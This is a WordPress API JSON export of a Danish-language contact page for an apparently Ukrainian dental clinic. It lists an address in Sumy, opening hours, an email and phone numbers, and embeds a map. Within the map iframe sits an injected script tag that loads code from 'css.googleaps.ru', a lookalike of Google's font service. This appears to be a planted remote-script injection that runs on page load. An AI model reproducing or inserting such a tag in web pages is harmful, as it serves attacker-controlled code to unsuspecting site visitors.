{"id":3705,"date":"2014-01-20T15:05:32","date_gmt":"2014-01-20T13:05:32","guid":{"rendered":"http:\/\/www.your-brilliant-smile.com\/?page_id=3705"},"modified":"2014-01-20T15:05:32","modified_gmt":"2014-01-20T13:05:32","slug":"kontakter","status":"publish","type":"page","link":"https:\/\/your-brilliant-smile.com\/da\/kontakter","title":{"rendered":"Kontakter"},"content":{"rendered":"<p><iframe loading=\"lazy\" src=\"https:\/\/maps.google.com\/maps?f=q&amp;source=s_q&amp;hl=ru&amp;geocode=&amp;q=%D0%9F%D1%80%D0%BE%D0%BC%D1%8B%D1%88%D0%BB%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9+%D0%BF%D0%B5%D1%80%D0%B5%D1%83%D0%BB%D0%BE%D0%BA+12%2F2,+%D0%A1%D1%83%D0%BC%D1%8B,+%D0%A1%D1%83%D0%BC%D1%81%D0%BA%D0%B0%D1%8F+%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C,+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B0&amp;aq=&amp;sll=50.915724,34.802177&amp;sspn=0.008239,0.021007&amp;ie=UTF8&amp;hq=&amp;hnear=%D0%9F%D1%80%D0%BE%D0%BC%D1%8B%D1%88%D0%BB%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9+%D0%BF%D0%B5%D1%80.,+12,+%D0%A1%D1%83%D0%BC%D1%8B,+%D0%A1%D1%83%D0%BC%D1%81%D0%BA%D0%BE%D0%B9+%D1%80%D0%B0%D0%B9%D0%BE%D0%BD,+%D0%A1%D1%83%D0%BC%D1%81%D0%BA%D0%B0%D1%8F+%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C,+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B0&amp;t=m&amp;z=14&amp;iwloc=A&amp;ll=50.915728,34.802171&amp;output=embed\" height=\"630\" width=\"630\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/iframe><br \/>\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https:\/\/maps.google.com\/maps?f=q&amp;source=embed&amp;hl=ru&amp;geocode=&amp;q=%D0%9F%D1%80%D0%BE%D0%BC%D1%8B%D1%88%D0%BB%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9+%D0%BF%D0%B5%D1%80%D0%B5%D1%83%D0%BB%D0%BE%D0%BA+12%2F2,+%D0%A1%D1%83%D0%BC%D1%8B,+%D0%A1%D1%83%D0%BC%D1%81%D0%BA%D0%B0%D1%8F+%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C,+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B0&amp;aq=&amp;sll=50.915724,34.802177&amp;sspn=0.008239,0.021007&amp;ie=UTF8&amp;hq=&amp;hnear=%D0%9F%D1%80%D0%BE%D0%BC%D1%8B%D1%88%D0%BB%D0%B5%D0%BD%D0%BD%D1%8B%D0%B9+%D0%BF%D0%B5%D1%80.,+12,+%D0%A1%D1%83%D0%BC%D1%8B,+%D0%A1%D1%83%D0%BC%D1%81%D0%BA%D0%BE%D0%B9+%D1%80%D0%B0%D0%B9%D0%BE%D0%BD,+%D0%A1%D1%83%D0%BC%D1%81%D0%BA%D0%B0%D1%8F+%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C,+%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D0%B0&amp;t=m&amp;z=14&amp;iwloc=A&amp;ll=50.915728,34.802171\">\u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0443\u0432\u0435\u043b\u0438\u0447\u0435\u043d\u043d\u0443\u044e \u043a\u0430\u0440\u0442\u0443<\/a><\/small><\/p>\n<p><strong>Adresse:<\/strong> Ukraine, Sumy Industrial Lane 12\/2 (mellem butikken &#8220;Extravaganza&#8221; Gorky Street og restaurant &#8220;Crystal &#8216;s Prospect Shevchenko)<\/p>\n<p><strong>\u00c5bningstider:<\/strong><\/p>\n<p><strong>man-fre<\/strong> 8:00 til 20:00<\/p>\n<p><strong>l\u00f8r fra<\/strong> 9:00 til 18:00 (efter aftale)<\/p>\n<p><strong>s\u00f8n<\/strong> lukket<\/p>\n<p><strong>E-mail:<\/strong> <a title=\"katsumoto2018@gmail.com\" href=\"mailto: katsumoto2018@gmail.com\">katsumoto2018@gmail.com<\/a><\/p>\n<p><strong>Telefoner<\/strong><\/p>\n<p>+38 (0542) 660 193<\/p>\n<p>+38 (066) 196 87 93<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0443\u0432\u0435\u043b\u0438\u0447\u0435\u043d\u043d\u0443\u044e \u043a\u0430\u0440\u0442\u0443 Adresse: Ukraine, Sumy Industrial Lane 12\/2 (mellem butikken &#8220;Extravaganza&#8221; Gorky Street og restaurant &#8220;Crystal &#8216;s Prospect Shevchenko) \u00c5bningstider: man-fre 8:00 til 20:00 l\u00f8r fra 9:00 til 18:00 (efter aftale) s\u00f8n lukket E-mail: katsumoto2018@gmail.com Telefoner +38 (0542) 660 193 +38 (066) 196 87 93<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages\/3705"}],"collection":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/comments?post=3705"}],"version-history":[{"count":1,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages\/3705\/revisions"}],"predecessor-version":[{"id":3706,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages\/3705\/revisions\/3706"}],"wp:attachment":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/media?parent=3705"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}